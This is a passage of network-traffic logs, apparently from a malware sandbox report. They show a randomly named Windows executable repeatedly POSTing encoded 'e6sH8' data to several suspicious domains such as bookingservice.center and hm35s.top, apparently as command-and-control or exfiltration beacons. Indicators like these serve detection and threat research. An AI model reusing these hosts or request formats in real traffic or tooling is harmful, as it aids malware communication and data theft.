                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Jan 11, 2025 01:21:51.981931925 CET | 218 | IN
                                                                  Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.5 | 49984 | 98.124.224.17 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:21:54.016699076 CET | 739 | OUT | POST /47f1/ HTTP/1.1
                                                                  Host: www.bookingservice.center
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.bookingservice.center
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.bookingservice.center/47f1/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=MMfsStaAwy1Dh3DS3VKV2OgNu/poPrCsyuSVSuefELenfawJv7I5H0gg8oP5TXxKQ/7y7//BMfxhGrM0DztyrVIKnnYEiASw+JMRZ0lmOCdcmaEr9F9DK0Ecdoa9hYWLxXjuz+sGTkSsiTD1J4rvhdtpk1BJwqjbWJUpP7Yi2Qc7jWVy++fVflOhX7YyRkZlGJ2i6++ylc+XkLTfuP2A9L5nc30U
Jan 11, 2025 01:21:54.551496983 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Date: Sat, 11 Jan 2025 00:21:54 GMT
                                                                  Connection: close
                                                                  Content-Length: 1245
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Jan 11, 2025 01:21:54.551522017 CET | 218 | IN
                                                                  Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.5 | 49985 | 98.124.224.17 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:21:56.563452005 CET | 1756 | OUT | POST /47f1/ HTTP/1.1
                                                                  Host: www.bookingservice.center
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.bookingservice.center
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.bookingservice.center/47f1/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
Jan 11, 2025 01:21:57.091456890 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Date: Sat, 11 Jan 2025 00:21:56 GMT
                                                                  Connection: close
                                                                  Content-Length: 1245
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Jan 11, 2025 01:21:57.091552019 CET | 218 | IN
                                                                  Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.5 | 49986 | 98.124.224.17 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:21:59.105154991 CET | 442 | OUT | GET /47f1/?e6sH8=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8CpTp0QkkBq1y4sNZ2ldFAdykoca83krEGIrLt+evp31gA==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.bookingservice.center
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:21:59.620143890 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Date: Sat, 11 Jan 2025 00:21:58 GMT
                                                                  Connection: close
                                                                  Content-Length: 1245
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                  Jan 11, 2025 01:21:59.620172024 CET | 218 | IN | Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  5 | 192.168.2.5 | 49989 | 103.21.221.4 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:05.016453028 CET | 722 | OUT | POST /4iun/ HTTP/1.1
                                                                  Host: www.tempatmudisini06.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.tempatmudisini06.click
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.tempatmudisini06.click/4iun/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=bTgLVsC6Z4yYT+RnOjxJPp3wJRhBrW70jl7GWZHlybnIE1fh+51IpVyj8OjyDIGVSBy21yU/pDnwoxsCtR8fh9axKcNReJr6ndPct8GVulHTT7dliHNm+0DvbMzP5FzfUneFu+YQ7OQTzWyewUo/l+1xm06GbMYzkmXr2HcTMzBJ9UjhzmajocnpouBXIzrU6WWS9SI=
                                                                  Jan 11, 2025 01:22:05.824450016 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Sat, 11 Jan 2025 00:22:05 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  6 | 192.168.2.5 | 49990 | 103.21.221.4 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:07.563465118 CET | 742 | OUT | POST /4iun/ HTTP/1.1
                                                                  Host: www.tempatmudisini06.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.tempatmudisini06.click
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.tempatmudisini06.click/4iun/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=bTgLVsC6Z4yYQeBnMEdJIJ3xXhhBi27wjkHGWYC4yJDIFRPh/41Il1yj3uj3e4GkSB++130/pDzwox8CumIYgtaJH8NXQpr6ndPct9izukvTTLNlimNl2UDoLczPv1zTUnfSu7BY7NoTzWCewFo4q+1NoU7Lc/5XqnKh0mYUMDJs1CSLpESL78LR49JgZDK9g1GijFeuDYtqC2K8qPUQLh9T4aiB
                                                                  Jan 11, 2025 01:22:08.468142033 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Sat, 11 Jan 2025 00:22:08 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  7 | 192.168.2.5 | 49991 | 103.21.221.4 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:10.113691092 CET | 1759 | OUT | POST /4iun/ HTTP/1.1
                                                                  Host: www.tempatmudisini06.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.tempatmudisini06.click
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.tempatmudisini06.click/4iun/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8= [TRUNCATED]
                                                                  Jan 11, 2025 01:22:11.009907007 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Sat, 11 Jan 2025 00:22:10 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  8 | 192.168.2.5 | 49992 | 103.21.221.4 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:12.652364969 CET | 443 | OUT | GET /4iun/?rr=BbldmNsp8&e6sH8=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpuauCK8BCe9zqr6jRwciKumWtZPYXukZtwjz9MdHPx1eFIw== HTTP/1.1
                                                                  Host: www.tempatmudisini06.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:13.564148903 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Sat, 11 Jan 2025 00:22:13 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  9 | 192.168.2.5 | 49993 | 154.23.184.95 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:18.671633959 CET | 683 | OUT | POST /lazq/ HTTP/1.1
                                                                  Host: www.hm35s.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.hm35s.top
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.hm35s.top/lazq/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=bv8vV/gVAlzxmpOn3CBpk74ZFoc4egQYIgScKhGKHrG3iUHKb96Whk9uEaYRLhx/FFpL78ffdACwr+Zxyb8bbjLMQ0X91IiZIjhaIbMiNmUC+d0RYIr/LxfSTtZ7yprTnHgaNPlI23eRFXOFqJlXaCpAyMLsdDqBHi+iFepZuq1lEqJs1764w2mztU231Yf4oWvixkE=
                                                                  Jan 11, 2025 01:22:19.565133095 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 00:22:19 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 148
                                                                  Connection: close
                                                                  ETag: "66a5f968-94"
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  10 | 192.168.2.5 | 49994 | 154.23.184.95 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:21.223113060 CET | 703 | OUT | POST /lazq/ HTTP/1.1
                                                                  Host: www.hm35s.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.hm35s.top
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.hm35s.top/lazq/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHZS3j13Ka4OWgk9uLKYQPhxCFFVD7+LfdAmwr/pxyq8YazLObUX74oiZIjhaIbpFNmMC/tkRJcH4IxfVUtZ72prpnHgCNO5u21mRFSqFqYlWDSp8vcKsdzrSHQCJFfslxpJEFc4GvZyQjWKL9H+Ako+Ry1/SvzSxkV00G0rTAZzCo1gqazXg
                                                                  Jan 11, 2025 01:22:22.100507021 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 00:22:21 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 148
                                                                  Connection: close
                                                                  ETag: "66a5f968-94"
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  11 | 192.168.2.5 | 49995 | 154.23.184.95 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:23.765350103 CET | 1720 | OUT | POST /lazq/ HTTP/1.1
                                                                  Host: www.hm35s.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.hm35s.top
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.hm35s.top/lazq/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:24.662247896 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 00:22:24 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 148
                                                                  Connection: close
                                                                  ETag: "66a5f968-94"
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  12 | 192.168.2.5 | 49996 | 154.23.184.95 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:26.306927919 CET | 430 | OUT | GET /lazq/?e6sH8=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVVX0RGb+5s2kSkhaf40FF0423J1jVorSDRX3Mt1+1Y+N0g==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.hm35s.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:27.188520908 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 00:22:27 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 148
                                                                  Connection: close
                                                                  ETag: "66a5f968-94"
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  13 | 192.168.2.5 | 49997 | 88.198.8.150 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:32.274576902 CET | 710 | OUT | POST /2lci/ HTTP/1.1
                                                                  Host: www.snehasfashion.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.snehasfashion.shop
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.snehasfashion.shop/2lci/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=oUpW0YhmY+UamE+XpdzGa234gYzZLfgDOoKHeVwLo6elcPfwSBpfSpfUsTYrrVLNid3v/gaIpMVHB/3KmGloFy+DX8+q+t55VXs8NgWNVsZHxESL5rLzScuAf+Q+LxjlN+PeyPhv/pGkKhqy3weIJan73WsCjg2hGN00X19NUUc5KXnuwdaoltybgHMInw3F/JyV3zU=
                                                                  Jan 11, 2025 01:22:32.998717070 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  x-powered-by: PHP/8.1.29
                                                                  cache-control: no-cache, private
                                                                  content-type: text/html; charset=UTF-8
                                                                  content-length: 1992
                                                                  content-encoding: br
                                                                  vary: Accept-Encoding
                                                                  date: Sat, 11 Jan 2025 00:22:32 GMT
                                                                  Jan 11, 2025 01:22:32.998760939 CET | 1005 | IN


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  14 | 192.168.2.5 | 49998 | 88.198.8.150 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:34.827812910 CET | 730 | OUT | POST /2lci/ HTTP/1.1
                                                                  Host: www.snehasfashion.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.snehasfashion.shop
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.snehasfashion.shop/2lci/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
